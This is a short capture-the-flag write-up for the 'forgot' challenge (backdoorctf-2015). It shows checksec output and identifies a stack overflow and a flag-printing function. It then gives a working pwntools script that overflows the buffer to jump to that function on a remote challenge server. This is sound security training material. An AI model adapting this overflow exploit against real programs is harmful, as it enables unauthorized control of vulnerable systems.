攻防世界 forgot writeup (backdoorctf-2015)

2019-08-02  111p1kk

checksec

kk@ubuntu:~/Desktop/black/GFSJ/forgot$ checksec forgot 
[*] '/home/kk/Desktop/black/GFSJ/forgot/forgot'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

IDA
Stack overflow.

The binary also contains a function that directly runs cat flag.

The exploit is as follows:

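#!/usr/bin/python

from pwn import *

io = remote("111.198.29.45", 54796)
# io = process("./forgot")  # run against the local binary instead
flag_addr = 0x080486CC  # address of the function that cats the flag

# Answer the first prompt
io.recv()
io.sendline(b"kk")

# Answer the second prompt: 32 + 4 filler bytes, then the target address
# (bytes literals so the concatenation with p32() also works on Python 3)
io.recv()
payload = b"a" * 32 + b"a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()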